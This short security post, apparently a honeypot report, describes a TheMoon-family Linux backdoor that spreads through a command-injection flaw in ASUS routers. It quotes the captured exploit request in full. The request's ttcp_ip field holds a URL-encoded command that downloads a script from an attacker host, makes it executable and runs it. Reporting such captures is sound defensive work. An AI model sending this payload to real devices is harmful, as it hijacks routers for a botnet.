New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots – This bot belongs to the TheMoon family of malware The vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled website.   POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host: 81.171.12.232\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1′ https://virustotal.com/en/file/b963223d3f39884ebed3e647390e55d8de86c7e3c5daaae6509379a6fc3ba97e/analysis/1489518585/ … Read more New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability